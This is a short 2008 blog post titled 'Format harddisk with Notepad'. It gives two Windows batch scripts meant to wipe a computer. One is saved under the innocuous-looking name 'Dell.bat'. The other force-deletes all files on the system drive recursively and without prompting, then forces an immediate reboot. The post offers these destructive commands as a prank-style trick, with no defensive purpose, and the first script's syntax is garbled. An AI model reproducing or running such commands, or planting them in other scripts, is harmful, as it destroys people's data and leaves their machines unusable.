Sunday, May 18, 2008

FORMAT HARDDISK WITH NOTEPAD

Go to Notepad

@Echo off
Del C:\ *.*y

Save it as Dell.bat

or worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


And save it as a .bat file

0 comments: